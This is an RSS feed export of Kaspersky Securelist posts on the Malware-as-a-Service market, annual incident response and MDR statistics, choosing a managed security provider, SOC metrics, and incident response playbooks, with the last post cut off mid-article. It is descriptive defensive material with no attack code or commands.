SOC, TI and IR posts – Securelist https://securelist.com Wed, 14 Jun 2023 13:52:47 +0000 en-US hourly 1 https://wordpress.org/?v=6.2.2 https://securelist.com/wp-content/themes/securelist2020/assets/images/content/site-icon.png SOC, TI and IR posts – Securelist https://securelist.com 32 32 Understanding Malware-as-a-Service https://securelist.com/malware-as-a-service-market/109980/ https://securelist.com/malware-as-a-service-market/109980/#comments Thu, 15 Jun 2023 10:00:56 +0000 https://kasperskycontenthub.com/securelist/?p=109980

Money is the root of all evil, including cybercrime. Thus, it was inevitable that malware creators would one day begin not only to distribute malicious programs themselves, but also to sell them to less technically proficient attackers, thereby lowering the threshold for entering the cybercriminal community. The Malware-as-a-Service (MaaS) business model emerged as a result of this, allowing malware developers to share the spoils of affiliate attacks and lowering the bar even further. We have analyzed how MaaS is organized, which malware is most often distributed through this model, and how the MaaS market depends on external events.

Results of the research

We studied data from various sources, including the dark web, identified 97 families spread by the MaaS model from 2015, and broke these down into five categories by purpose: ransomware, infostealers, loaders, backdoors, and botnets.

As expected, most of the malware families spread by MaaS were ransomware (58%), infostealers comprised 24%, and the remaining 18% were split between botnets, loaders, and backdoors.

Malware families distributed under the MaaS model from 2015 through 2022

Malware families distributed under the MaaS model from 2015 through 2022

Despite the fact that most of the malware families detected were ransomware, the most frequently mentioned families in dark web communities were infostealers. Ransomware ranks second in terms of activity on the dark web, showing an increase since 2021. At the same time, the total number of mentions of botnets, backdoors, and loaders is gradually decreasing.

Trends in the number of mentions of MaaS families on the dark web and deep web, January 2018 – August 2022

Trends in the number of mentions of MaaS families on the dark web and deep web, January 2018 – August 2022

There is a direct correlation between the number of mentions of malware families on the dark and deep web and various events related to cybercrime, such as resonant cyberattacks. Using operational and retrospective analysis, we identified the main events leading to a surge in the discussion of malware in each category.

Thus, in the case of ransomware, we studied the dynamics of mentions using five infamous families as an example: GandCrab, Nemty, REvil, Conti, and LockBit. The graph below highlights the main events that influenced the discussion of these ransomware families.

Number of mentions of five ransomware families distributed under the MaaS model on the dark web and deep web, 2018–2022

Number of mentions of five ransomware families distributed under the MaaS model on the dark web and deep web, 2018–2022

As we can see in the graph above, the termination of group operations, arrests of members, and deletion of posts on hidden forums about the spread of ransomware fail to stop cybercriminal activity completely. A new group replaces the one that has ceased to operate, and it often welcomes members of the defunct one.

MaaS terminology and operating pattern

Malefactors providing MaaS are commonly referred to as operators. The customer using the service is called an affiliate, and the service itself is called an affiliate program. We have studied many MaaS advertisements, identifying eight components inherent in this model of malware distribution. A MaaS operator is typically a team consisting of several people with distinct roles.

For each of the five categories of malware, we have reviewed in detail the different stages of participation in an affiliate program, from joining in to achieving the attackers’ final goal. We have found out what is included in the service provided by the operators, how the attackers interact with one another, and what third-party help they use. Each link in this chain is well thought out, and each participant has a role to play.

Below is the structure of a typical infostealer affiliate program.

Infostealer affiliate program structure

Cybercriminals often use YouTube to spread infostealers. They hack into users’ accounts and upload videos with crack ads and instructions on how to hack various programs. In the case of MaaS infostealers, distribution relies on novice attackers, traffers, hired by affiliates. In some cases, it is possible to de-anonymize a traffer by having only a sample of the malware they distribute.

Telegram profile of an infostealer distributor

Translation:

Pontoviy Pirozhok (“Cool Cake”)
Off to work you go, dwarves!

Telegram profile of an infostealer distributor

Monitoring the darknet and knowing how the MaaS model is structured and what capabilities attackers possess, allows cybersecurity professionals and researchers to understand how the malicious actors think and to predict their future actions, which helps to forestall emerging threats. To inquire about threat monitoring services for your organization, please contact us at: dfi@kaspersky.com.

To get the full version of the report “Understanding Malware-as-a-Service” (PDF) fill in the form below.

]]>
https://securelist.com/malware-as-a-service-market/109980/feed/ 11 full large medium thumbnail
The nature of cyberincidents in 2022 https://securelist.com/kaspersky-incident-response-report-2022/109680/ https://securelist.com/kaspersky-incident-response-report-2022/109680/#respond Tue, 16 May 2023 08:00:57 +0000 https://kasperskycontenthub.com/securelist/?p=109680

Kaspersky offers various services to organizations that have been targeted by cyberattackers, such as incident response, digital forensics, and malware analysis. In our annual incident response report, we share information about the attacks that we investigated during the reporting period. Data provided in this report comes from our daily interactions with organizations seeking assistance with full-blown incident response or complementary expert services for their internal incident response teams.

Download the full version of the report (PDF)

Kaspersky Incident Response in various regions and industries

In 2022, 45.9% of organizations that encountered cyberincidents were in Russia and the CIS region, followed by the Middle East (22.5%), the Americas (14.3%), and Europe (13.3%).

From an industry perspective, we offered help to government (19.39%), financial (18.37%), and industrial (17.35%) organizations most frequently.

In 2022, attackers most often penetrated organizations’ infrastructure by exploiting various vulnerabilities in public-facing applications (42.9%). However, compared to 2021, the share of this initial attack vector decreased by 10.7 pp, while the share of attacks involving compromised accounts (23.8%) grew. Malicious e-mail sharing among the initial attack vectors continued to go down and comprised 11.9% in 2022.

In 39.8% cases the reported incidents were related to ransomware attacks. Encrypted data remains the number-one problem that our customers are faced with. However, compared to 2021, the number of ransomware-related incidents dropped, and not every attack involving file encryption was aimed at extracting a ransom. In some of these incidents, ransomware was used to hide the initial traces of the attack and complicate the investigation.

Expert recommendations

To protect your organization against cyberattacks, Kaspersky experts recommend the following:

  • Implement a robust password policy and enforce multifactor authentication
  • Remove management ports from public access
  • Establish a zero-tolerance policy for patch management or compensation measures for public-facing applications
  • Make sure that your employees maintain a high level of security awareness
  • Use a security toolstack with EDR-like telemetry
  • Implement rules for detection of pervasive tools used by adversaries
  • Continuously train your incident response and security operations teams to maintain their expertise and stay up to speed with the changing threat landscape
  • Back up your data on a regular basis
  • Work with an Incident Response Retainer partner to address incidents with fast SLAs

To learn more about incident response in 2022, including a MITRE ATT&CK tactics and techniques heatmap, and distribution of various incidents by region and industry, download the full version of the report (PDF).

For a deeper analysis of the vulnerabilities most commonly exploited by cyberattackers, download this appendix (PDF).

]]>
https://securelist.com/kaspersky-incident-response-report-2022/109680/feed/ 0 full large medium thumbnail
Managed Detection and Response in 2022 https://securelist.com/mdr-report-2022/109599/ https://securelist.com/mdr-report-2022/109599/#respond Tue, 02 May 2023 08:00:15 +0000 https://kasperskycontenthub.com/securelist/?p=109599

Kaspersky Managed Detection and Response (MDR) is a service for 24/7 monitoring and response to detected incidents based on technologies and expertise of Kaspersky Security Operations Center (SOC) team. MDR allows detecting threats at any stage of the attack – both before anything is compromised and after the attackers have penetrated the company’s infrastructure. This is achieved through preventive security systems and active threat hunting – the essential MDR components. MDR also features automatic and manual incident response and expert recommendations.

The annual Kaspersky Managed Detection and Response analytical report sums up the analysis of incidents detected by Kaspersky SOC team. The report presents information on the most common offensive tactics and techniques, the nature and causes of incidents and gives a breakdown by country and industry.

2022 incidents statistics

Security events

In 2022, Kaspersky MDR processed over 433,000 security events. 33% of those (over 141,000 events) were processed using machine learning technologies, and 67% (over 292,000) were analyzed manually by SOC analysts.

Over 33,000 security events were linked to 12,000 real incidents. Overall, 8.13% of detected incidents were of high, 71.82% of medium, and 20.05% of low severity.

Response efficiency

72% of 2022 incidents were detected based on a single security event, after which the attack was stopped right away. Of these, 4% were of high, 74% of medium, and 22% of low severity.

On average, in 2022, a high severity incident took the SOC team 43.8 minutes to detect. The 2022 figures for medium and low severity incidents are 30.9 and 34.2, respectively.

Geographical distribution, breakdown by industry

In 2022, 44% of incidents were detected in European organizations. Russia and CIS are in second place with a quarter of all detected incidents. Another 15% of incidents relate to organizations from the Asia-Pacific.

Industry-wise, industrial organizations suffered more incidents than any. Most of the critical incidents were detected in government agencies, industrial and financial organizations. It is worth noting though that a fair share of critical incidents across financial organizations was due to Red Teaming events.

Recommendations

For effective protection from cyberattacks, these are Kaspersky SOC team’s recommendations to organizations:

  • Apart from the classic monitoring instruments, deploy the active threat hunting methods and tools allowing for early detection of incidents.
  • Hold regular cyberdrills involving Red Teaming to train your teams to detect attacks and analyze the organization’s security.
  • Practice the multilevel malware protection approach comprising various threat detection technologies – from signature analysis to machine learning.
  • Use MITRE ATT&CK knowledge bases.

See the full version of the report (PDF) for more information on the incidents detected in 2022, main offensive tactics and techniques, MITRE ATT&CK classification of incidents, and detection methods. To download it, please, fill in the form below.

]]>
https://securelist.com/mdr-report-2022/109599/feed/ 0 full large medium thumbnail
Selecting the right MSSP: Guidelines for making an objective decision https://securelist.com/selecting-the-right-mssp/109321/ https://securelist.com/selecting-the-right-mssp/109321/#respond Thu, 30 Mar 2023 10:00:06 +0000 https://kasperskycontenthub.com/securelist/?p=109321

Managed Security Service Providers (MSSPs) have become an increasingly popular choice for organizations nowadays following the trend to outsource security services. Meanwhile, with the growing number of MSSPs in the market, it can be difficult for organizations to determine which provider will fit in the best way. This paper aims to provide guidance for organizations looking to select an MSSP and help to identify the benefits and drawbacks of using an MSSP.

To make an all-round choice, let’s try to answer the following questions:

  • What exact services do we need?
  • Why does my organization need an MSSP?
  • When does my organization need an MSSP?
  • Who should deliver the service?

MSSP Services

First, let’s start with what services we can expect. Here are some of the most common security services provided by MSSPs:

  • Security Monitoring

    24/7 monitoring of the organization’s network, systems, and applications to identify potential security threats and anomalies; can be provided as an on-premises solution (when data must not leave the customer infrastructure) or as a service.

  • Incident Response (IR)

    Responding to security incidents and breaches, investigating, and containing the incident. Incident Response can be provided in multiple forms, from recommendations for the customer IR team to pre-agreed response actions in the customer environment.

  • Managed Detection and Response (MDR)

    A combination of the previous two services. Usually, MDR is considered an evolution of classic monitoring and response services due to the utilization of advanced threat-detection techniques. Also, MDR supports embedded response capabilities within the platform, which are supplied and fully managed by the service provider.

  • Threat Intelligence (TI)

    Provision of intelligence on current and emerging threats to the organization’s security. The best-known and simplest form of TI is IoC feeds that indicate the presence in the customer environment of known signs of attacks. But there are other deliverables, too, focused on different maturity levels of TI consumers within the organization.

    Note that the use of TI requires an in-house security team, so it is not possible to fully outsource it. TI data has to be applied internally to bring value.

  • Managed Security Solutions

    Multiple services focused on administering security solutions that are deployed in customer environments. These services are commonly bundled if the customer wants on-premise deployment of MSSP technologies.

There is an extended set of services not directly involved in day-to-day operations, but still valuable on a one-time or regular basis.

  • Digital Forensics and Incident Response (DFIR) or Emergency Incident Responder

    The ultimate form of incident response that provides a full-scale DFIR service in case of critical incidents in the customer environment.

  • Malware Analysis

    A narrow-focus service providing extended reporting and behavior analysis of submitted malware. The service requires an in-house team to properly utilize the analysis results.

  • Security Assessment

    A group of services focused on the identification of target infrastructure or application vulnerabilities, weaknesses, and potential attack vectors. Among the best-known services are penetration testing, application security assessment, red teaming, and vulnerability assessment.

  • Attack Surface Management (ASM)

    A service focused on the collection of information related to the organization’s public-facing assets.

  • Digital Footprint Intelligence (DFI)

    A service focused on searching for, collecting, and analyzing organization-related threats in external sources. Typical deliverables include information about leaked accounts, organization-related tracks in malware logs, post and advertisements for the sale of infrastructure access, and a list of actors who can target the organization. Clearly, DFI replaced many TI tasks related to external sources processing.

As we can see, some services can replace the overall function of the in-house team (monitoring, MDR, assessment), while others can be considered as additional support for the existing team (TI, malware analysis, DFIR). The overall scenario of MSSP usage – whenever the function is required and can’t be provided within the organization. So, a key task for the organization is to define its needs, priorities, and available resources.

Scenarios for MSSP involvement

Switching to MSSP involvement scenarios can provide significant value.

Scenario 1

The typical one: you need to establish a specific function quickly. In such cases, an MSSP will save you time and money, and provide value in the short term. This case is applicable whenever you want to implement or test some additional services in your SOC.

Scenario 2

You have to build a security function from scratch. Even if, in the end, all security services should be built in-house, the involvement of an MSSP will be a good idea, since like in scenario 1 it helps to get the service up and running. Later, you can transfer specific services to the in-house team, considering all service aspects and expertise obtained from the MSSP by your team. At the same time, such an approach will help you to implement security functions step-by-step, replacing MSSP services one by one, focusing on one topic at a time, and avoiding security interruptions due to missing services.

Scenario 3

You need extensive growth. Whenever your business is growing, cybersecurity cannot always follow with the same speed. Especially in cases of company mergers and acquisitions, the IT landscape jumps to a new level that cannot be covered promptly by an in-house team. This case can transform into scenario 1 or 2, depending on the nature of this growth. If it’s a one-time event, probably later you’d like to transfer the function to the in-house team, when it will be ready to handle the new volume.

All the more reasons to engage an MSSP

Besides specific cases, there are common reasons to support engaging an MSSP over developing in-house capability. Here are some of them:

  • Lack of In-House Expertise

    Many organizations do not have the necessary in-house expertise to effectively manage and respond to security threats. Some roles and functions require deep knowledge and continuous growth of expertise, which cannot be maintained within the organization. At the same time, an MSSP has a chance to work simultaneously with multiple customers, therefore the intensity of incidents and conducted investigations are much higher and generates more experience for MSSP teams.

  • Resource Constraints

    Smaller organizations may not have the resources to build and manage a comprehensive security program. An MSSP can provide the necessary security services to help these organizations mitigate security risks without having to hire a full security team and, in more complex cases, to maintain this full-scale team in the long term.

  • Cost Savings

    It can be expensive to build and maintain an in-house security program. Outsourcing security services to an MSSP can be a more cost-effective solution, particularly for smaller organizations. Also, the MSSP approach allows you to spread the budget over time, since establishing a service in-house requires significant investments from day one.

  • Scalability

    Fast-growing organizations may find it difficult to scale their security program at the same pace. An MSSP can provide scalable security services able to grow with the organization.

  • Flexibility

    In case of outsourcing, it is much easier to manage the level of service, from playing with the SLA options for a particular MSSP to changing provider every time the preconditions change or a better proposal emerges in the market.

    Overall, an MSSP can help organizations improve their security posture, manage risk, and ensure compliance while optimizing costs and resource constraints. Considering the reasons for involving an MSSP, to complete the picture, we must mention not only the pros but the cons as well. Possible stop factors to think twice about are:

  • Increasing risk

    Every new partner extends the potential attack surface of your organization. During the contract lifetime, you should consider the risks of MSSP compromise and supply-chain attacks on the service, especially if the MSSP has a high level of privileges (usually required under a contract for advanced Incident Response). The provider can mitigate the risk by demonstrating complex cybersecurity program, applied by their infrastructure and independent assessments.

    Also, it’s important to off-board the MSSP correctly in case of contract termination. This off-boarding should include careful access revocation and rollback of all changes done in the network, configurations, etc.

  • Lack of understanding

    Do you know what is within your infrastructure, and how business processes are tied to the IT environment? What is typical and normal in your network? Do you have an asset DB? What about an account registry and a list of full regularly reviewed privileges? I guess not all answers were positive. Bad news: the MSSP will have an even less clear understanding of what is within the protected environment, since its only trustful source of information is you.

  • Need to control the MSSP

    It is essential to conduct a thorough analysis and evaluation of every service contract, particularly when it comes to selecting an MSSP. To achieve this, an expert from within the organization should be assigned to handle the contract and carefully scrutinize all details, conditions, and limitations. Additionally, the service delivery should be closely observed and evaluated throughout the lifetime of the contract. Generally, this means that it is not possible to entirely outsource the security function without establishing at least a small security team in-house. Moreover, the output from the service should be processed by an internal team, especially in cases where incidents, anomalies, or misconfigurations are detected.

In-house or MSSP for SMB

The decision between using an MSSP or building an in-house SOC for small and medium-sized business (SMB) can depend on various factors, including the organization’s budget, resources, and security needs. Here are some MSSP benefits provided in SMB cases:

  • Expertise

    MSSP can provide a level of expertise in security that may not be available in-house, particularly for smaller organizations with limited security resources. Commonly, SBM does not have a security team at all.

  • Cost

    Building an in-house SOC is an expensive way that includes the cost of hiring experienced security professionals, investing in security tools and technologies, and building a security infrastructure.

  • Scalability

    As an SMB grows, its security needs may also grow. An MSSP can provide scalable security services that can grow with the organization without investing in additional security resources.

Overall, for many SMBs, outsourcing security services to an MSSP can be a more cost-effective solution than building an in-house SOC.

For large enterprises, as in other complex cases, the answer will be “it depends.” There are a lot of factors to be considered.

Finding the balance

Considering the pros and cons of outsourcing security services, I suggest finding the right balance. One balanced way can be a hybrid approach in which the organization builds some services in-house and outsources others.

The first variation of the hybrid approach is to build core functions (like Security Monitoring, Incident Response, etc.) by yourself and outsource everything that would make no sense to build in-house. Such an approach lets you build strong core functions and not waste time and resources on functions that require narrow skills and tools. Any MSSP services we have mentioned in the extended category are good candidates for such an approach.

Another variant of the hybrid approach is to develop the expertise of incident responders, who know the environment and are able to respond to advanced attacks. Incident detection and initial analysis in this case can be outsourced, which gives better scalability and the ability to focus on serious matters.

The transition approach fits the conditions when you need to build a security function right here and now, but still focus on the later development of an in-house SOC. So, you can start with outsourcing security services and gradually replacing them one by one with in-house functions, whenever the team, technologies, and resources will be ready.

Choosing the right one

As a very first step, we have to define our needs, the services we are looking for, and the overall strategy we are going to follow in outsourcing security services, considering everything we have discussed before.

The next step is to choose the right provider. Here are the criteria to keep in mind during the screening procedure:

  • Look for expertise and experience

    Choose an MSSP with the necessary expertise. Pay attention to experience with clients in your region/industry as well as well-known global players. Consider the number of years in the market – it is usually simpler to find a proven partner than take a chance with a disruptive new player.

    Threat detection and cyberthreat hunting are related to security research. Check if the MSSP has appropriate research capabilities that can be measured by number and depth of publications related to new APT groups, tools and techniques used, and methods of detection and investigation.

    Another significant point is the team. All services are provided by individual people, so make sure that the MSSP employs qualified personnel with the required level of education and world-recognized certification.

  • Consider the MSSP’s technology

    Ensure that the MSSP uses relevant tool and technologies to provide effective security solutions. A simple example: if the MSSP is focused on Windows protection, that will not fit an environment built on Unix. There are more nuances regarding MSSP technology platforms, which we will come back to later.

  • Check for compliance

    Ensure that the MSSP follows industry compliance regulations and standards if applicable to your business.

  • Evaluate customer experience and support

    Find references and success stories and collect feedback from other companies – clients of the potential service provider. Focus on customer support experience, including responsiveness, availability, and expertise.

  • Consider SLA

    Type, what metrics are used, and how are these metrics tracked and calculated. And, of course, SLA target values that can be provided by the vendor.

  • Consider the cost

    Compare the cost of MSSP services from different providers and choose the one that, other things being equal, offers the best value for your business.

  • Security

    Does the vendor pay attention to the security topic: cybersecurity hygiene, regular assessments by external experts? That is only a small part to check if you don’t want to lower your protection.

  • Ask for proof of concept (PoC)

    Mature players provide a test period, so you can have hands-on experience with most aspects of service provision and deliverables.

The technology question is a bit tricky. In most cases, we can split MSSPs into two big groups: the first use enterprise solutions, the second self-developed tools or open source with customization.

The first group needs to share their revenue with the vendor providing technology, but if later you decide to build an on-prem SOC platform, the migration can be simplified if you choose the same vendor platform. Also, you won’t need to implement too many changes in your environment. Furthermore, if the organization intends to adopt a transition approach and establish an in-house SOC based on a specific technology, the use of an MSSP with the corresponding technical solution can serve as an “extended test drive” for the chosen platform.

The second group usually focuses on a highly custom solution that lets the MSSP fine-tune the technology platform for better results. In a lot of cases, this can be a conglomerate of multiple tools and platforms, integrated to provide more advanced detection and analysis methods. Commonly this platform cannot be adopted by customers for independent usage.

Another question we should mention: is it worth splitting services between multiple providers? On the one hand, such diversity can help to choose the best provider for specific services; on the other, you can feel the synergy of multiple services provided by the same vendor in a bundle. E.g., if you have monitoring from one provider, the provision of DFIR by the same company will create positive synergy due to the ability to exchange information about historical incidents and to continuously monitor DFIR IoCs.

Buying defensive services, don’t forget about offensive assessments, and checking contract conditions for to conduct red teaming, pen tests or conducting cyber ranges. Any type of assessment will be valuable to proof MSS value and train your team.

Summary

When selecting an MSSP, it is important for organizations to keep their security goals in mind and align them with the criteria used for evaluation. With a large number of players in the market, it is always possible to choose the one that best meets the organization’s specific requirements and strategy. Careful consideration of factors such as service offerings, reputation, technology, and cost will help organizations find the right MSSP to meet their security needs.

]]>
https://securelist.com/selecting-the-right-mssp/109321/feed/ 0 full large medium thumbnail
Understanding metrics to measure SOC effectiveness https://securelist.com/understanding-metrics-to-measure-soc-effectiveness/109061/ https://securelist.com/understanding-metrics-to-measure-soc-effectiveness/109061/#respond Fri, 24 Mar 2023 08:00:56 +0000 https://kasperskycontenthub.com/securelist/?p=109061

The security operations center (SOC) plays a critical role in protecting an organization’s assets and reputation by identifying, analyzing, and responding to cyberthreats in a timely and effective manner. Additionally, SOCs also help to improve overall security posture by providing add-on services like vulnerability identification, inventory tracking, threat intelligence, threat hunting, log management, etc. With all these services running under the SOC umbrella, it pretty much bears the burden of making the organization resilient against cyberattacks, meaning it is essential for organizations to evaluate the effectiveness of a cybersecurity operations center. An effective and successful SOC unit should be able to find a way to justify and demonstrate the value of their existence to stakeholders.

Principles of success

Apart from revenue and profits, there are two key principles that drive business success:

  • Maintaining business operations to achieve the desired outcomes
  • Continually improving by bringing in new ideas or initiatives that support the overall goals of the business

The same principles are applied to any organization or entity that is running a SOC, acting as a CERT, or providing managed security services to customers. So, how do we ensure the services being provided by security operations centers are meeting expectations? How do we know continuous improvement is being incorporated in daily operations? The answer lies in the measurement of SOC internal processes and services. By measuring the effectiveness of processes and services, organizations can assess the value of their efforts, identify underlying issues that impact service outcomes, and give SOC leadership the opportunity to make informed decisions about how to enhance performance.

Measuring routine operations

Let’s take a closer look at how we can make sure routine security operations are providing services within the normal parameters to a business or subscribed customers. This is where metrics, service-level indicators (SLIs) and key performance indicators (KPIs) come into play; metrics provide a quantitative value to measure something, KPIs set an acceptable value on a key metric to evaluate the performance of any particular internal process, and SLIs provide value to measure service outcomes that are eventually linked with service SLAs. With regard to KPIs, if the metric value falls into the range of a defined KPI value, then the process is deemed to be working normally; otherwise, it provides an indication of reduced performance or possibly a problem.

The following figure clarifies the metric types generally used in SOCs and their objectives:

One important thing to understand here is that not all metrics need a KPI value. Some of the metric, such as monitoring ones, are required to be measured for the informational purpose. This is because they provide valuable support to track functional pieces of SOC operations where their main objective is to assist SOC teams in forecasting problems that could potentially decrease the operational performance.

The following section provides some concrete examples to reinforce understanding:

Example 1: Measuring analysts’ wrong verdicts

Process Metric Name Type Metric Description Target
Security monitoring process Wrong verdict KPI (internal) % of alerts wrongly triaged by the SOC analyst 5%

This example involves the evaluation of a specific aspect of the security monitoring process, namely the accuracy of SOC analyst verdicts. Measuring this metric can aid in identifying critical areas that may affect the outcome of the security monitoring process. It should be noted that this metric is an internal KPI, and the SOC manager has set a target of 10% (target value is often set based on the existing levels of maturity). If the percentage of this metric exceeds the established target, it suggests that the SOC analyst’s triage skills may require improvement, hence providing valuable insight to the SOC manager.

Example 2: Measuring alert triage queue

Process Metric Name Type Metric Description Target
Security monitoring process Alert triage queue Monitoring metric Number of alerts waiting to be triaged Dynamic

This specific case involves assessment of a different element of the security monitoring process – the alert triage queue. Evaluating this metric can provide insights into the workload of SOC analysts. It is important to note that this is a monitoring metric, and there is no assigned target value; instead, it is classified as a dynamic value. If the queue of incoming alerts grows, it indicates that the analyst’s workload is increasing, and this information can be used by SOC management to make necessary arrangements.

Example 3: Measuring time to detect incidents

Service Metric Name Type Metric Description Target
Security monitoring service Time to detect SLI Time required to detect a critical incident 30 minutes

In this example, the effectiveness of the security monitoring service is evaluated by assessing the time required to detect a critical incident. Measuring this metric can provide insights into the efficiency of the security monitoring service for both internal and external stakeholders. It’s important to note that this metric is categorized as a service-level indicator (SLI), and the target value is set at 30 minutes. This target value represents a service-level agreement (SLA) established by the service consumer. If the time required for detection exceeds the target value, it signifies an SLA breach.

Evaluating the everyday operations of a practical SOC unit can be challenging due to the unavailability or inadequacy of data, and gathering metrics can also be a time-consuming process. Therefore, it is essential to select suitable metrics (which will be discussed later in the article) and to have the appropriate tools and technologies in place for collecting, automating, visualizing, and reporting metric data.

Measuring improvement

The other essential element in the overall success of security operations is ‘continuous improvement’. SOC leadership should devise a program where management and SOC employees get an opportunity to create and pitch ideas for improvement. Once ideas are collected from different units of security operations, they are typically evaluated by management and team leads to determine their feasibility and potential impact on the SOC goals. The selected ideas are then converted into initiatives along with the corresponding metrics and desired state, and lastly their progress is tracked and evaluated to measure their results over a period of time. The goal of creating initiatives through ideas management is to encourage employee engagement and continuously improve SOC processes and operations. Typically, it is the SOC manager and lead roles who undertake initiatives to fix technical and performance-related matters within the SOC.

A high-level flow is depicted in the figure below:

Whether it is for routine security operations or ongoing improvement efforts, metrics remain a common parameter for measuring performance and tracking progress.

Three common problems that we often observe in real-world scenarios are:

  • In the IT world the principle of “if it’s not broken, don’t fix it” is well known, and this mentality extends to operational units as well. Similarly, many SOCs prioritize current operations and only implement changes in response to issues rather than adopting a continuous improvement approach. This reluctance to change acts as a bottleneck for achieving continuous improvement.
  • Absence of a structured process to gather ideas for potential improvements results in only a fraction of these ideas being presented to the SOC management, and thus, only a fraction of them being implemented.
  • Absence of progress tracking for improvements – it’s not sufficient to simply generate and discuss ideas. Implementing ideas requires diligent monitoring of their progress and measuring their actual impact.

Example: Initiative to improve analyst triage verdicts

Revisiting ‘example 1’ presented in the ‘Measuring routine operations’ section, let us assume that the percentage of incorrect verdicts detected over the past month was 12%, indicating an issue that requires attention. Management has opted to provide additional training to the analysts with the goal of reducing this percentage to 5%. Consequently, the effectiveness of this initiative must be monitored for the specified duration to determine if the target value has been attained. It’s important to note that the metric, ‘Wrong verdicts’, remains unchanged, but the current value is now being used to evaluate progress towards the desired value of 5%. Once significant improvements are implemented, the target value can be adjusted to further enhance the analysts’ triage skills.

Metric identification and prioritization

SOCs generally do measure their routine operations and improvements using ‘metrics’. However, they often struggle to recognize if these metrics are supporting the decision-making process or showing any value to the stakeholders. Hunting for meaningful metrics is a daunting task. The common approach we have followed in SOC consulting services to derive meaningful metrics is to understand the specific goals and operational objectives of security operations. Another proven approach is the GQM (Goal-Question-Metric) system that involves a systematic, top-down methodology for creating metrics that are aligned with an organization’s goals. By starting with specific, measurable goals and working backwards to identify the questions and metrics needed to measure progress towards those goals, the GQM approach ensures that the resulting metrics are directly relevant to the SOC’s objectives.

Let’s illustrate our approach with an example. If a SOC is acting as a financial CERT, it is likely to focus on responding to incidents related to the financial industry, tracking and recording financials threats, providing advisory services, etc. Once the principal goals of the CERT are realized, the next step is to identify metrics that directly influence the CERT services outcomes.

Example: Metric identification

Goal Question Metric
Ensure participating financial institutions are informed about latest threat How can we determine the amount of time the CERT is taking to notify other financial institutions? Time it takes to notify participant banks after threat discovery

Similarly, for operational objectives, metrics are identified to track and measure processes that support financial CERT operations. This also leads to the issue of prioritizing metrics, as not all metrics hold the same level of importance. In fact, when selecting metrics, it is crucial to prioritize quality over quantity and therefore it is recommended to limit the collection of metrics to sharpen focus and increase efficiency. In order to emphasize the importance of prioritizing metrics, the metrics that directly support CERT goals take precedence over metrics supporting operational objectives because ultimately it is consumers and stakeholders who evaluate the services rendered.

To determine the appropriate metrics, several factors should be taken into account:

  • Metrics must be aligned with the primary goals and operational objectives
  • Metrics should assist in the decision-making process
  • Metrics must demonstrate their purpose and value to both internal operations and external stakeholders.
  • Metrics should be realistically achievable in terms of data collection, data accuracy, and reporting.
  • Metrics must also meet the criteria of the SMART (Specific, Measurable, Actionable, Realistic, Time-based) model.
  • Ideally, metrics should be automated to receive and analyze current values in order to visualize them as quickly as possible.
]]>
https://securelist.com/understanding-metrics-to-measure-soc-effectiveness/109061/feed/ 0 full large medium thumbnail
Developing an incident response playbook https://securelist.com/developing-an-incident-response-playbook/109145/ https://securelist.com/developing-an-incident-response-playbook/109145/#respond Thu, 23 Mar 2023 08:00:00 +0000 https://kasperskycontenthub.com/securelist/?p=109145

An incident response playbook is a predefined set of actions to address a specific security incident such as malware infection, violation of security policies, DDoS attack, etc. Its main goal is to enable a large enterprise security team to respond to cyberattacks in a timely and effective manner. Such playbooks help optimize the SOC processes, and are a major step forward to SOC maturity, but can be challenging for a company to develop. In this article, I want to share some insights on how to create the (almost) perfect playbook.

Imagine your company is under a phishing attack — the most common attack type. How many and what exact actions should the incident response team take to curb the attack? The first steps would be to find if an adversary is present and how the infrastructure had been penetrated (whether though an infected attachment or a compromised account using a fake website). Next, we want to investigate what is going on within the incident (whether the adversary persists using scheduled tasks or startup scripts) and execute containment measures to mitigate risks and reduce the damage caused by the attack. All these have to be done in a prompt, calculated and precise manner—with the precision of a chess grandmaster — because the stakes are high when it comes to technological interruptions, data leaks, reputational or financial losses.

Why defining your workflow is a vital prestage of playbook development

Depending on organization, the incident response process will comprise different phases. I will consider one of the most widespread NIST incident response life cycles relevant for most of the large industries — from oil and gas to the automotive sector.

The scheme includes four phases:

  • preparation,
  • detection and analysis,
  • containment, eradication, and recovery,
  • post-incident activity.

All the NIST cycles (or any other incident response workflows) can be broken down into “action blocks”. In turn, the latter can be combined depending on specific attack for a timely and efficient response. Every “action” is a simple instruction that an analyst or an automated script must follow in case of an attack. At Kaspersky, we describe an action as a building block of the form: <a subject> does <an action> on <an object> using <a tool>. This building block describes how a response team or an analyst (<a subject>) will perform a special action (<an action>) on a file, account, IP address, hash, registry key, etc. (<an object>) using systems with the functionality to perform that action (<a tool>).

Defining these actions at each phase of the company’s workflow helps to achieve consistency and create scalable and flexible scenarios, which can be promptly modified to accommodate changes in the infrastructure or any of the conditions.

An example of a common response action

An example of a common response action

1. Be prepared to process incidents

The first phase of any incident response playbook is devoted to the Preparation phase of the NIST incident response life cycle. Usually the preparation phase includes many different steps such as incident prevention, vulnerability management, user awareness, malware prevention, etc. I will focus on the step involving playbooks and incident response. Within this phase it is vital to define the alert field set and its visual representation. For the response team’s convenience, it is a good idea to prepare different field sets for each incident type.

A good practice before starting is to define the roles specific to the type of incident, as well as the escalation scenarios, and to dedicate the communication tools that will be used to contact the stakeholders (email, phone, instant messenger, SMS, etc.). Additionally, the response team has to be provided with adequate access to security and IT systems, analysis software and resources. For a timely response and to avoid human factor errors, automations and integrations need to be developed and implemented, that can be launched by the security orchestration, automation and response (SOAR) system.

2. Create a comfortable track for investigation

The next important phase is Detection that involves collecting data from IT systems, security tools, public information, and people inside and outside the organization, and identifying the precursors and indicators. The main thing to be done during this phase is configuring a monitoring system to detect specific incident types.

In the Analysis phase, I would like to highlight several blocks: documentation, triage, investigation, and notification. Documentation helps the team to define the fields for analysis and how to fill them once an incident is detected and registered in the incident management system. That done, the response team moves on to triage to perform incident prioritization, categorization, false positive checks, and searches for related incidents. The analyst must be sure that the collected incident data comply with the rules configured for detection of specific suspicious behavior. If the incident data and rule/policy logic mismatch, the incident may be tagged as a false positive.

The main part of the analysis phase is investigation, which comprises logging, assets and artifact enrichment, and incident scope forming. When in research mode, the analyst should be able to collect all the data about the incident to identify patient zero and the entry point — knowing how unauthorized access was obtained and which host/account had been compromised first. It is important because it helps to properly contain the cyberattack and prevent similar ones in the future. By collecting incident data one gets information about specific objects (assets and artifacts such as hostname, IP address, file hash, URL, and so on) relating to the incident, so one can extend the incident scope by them.

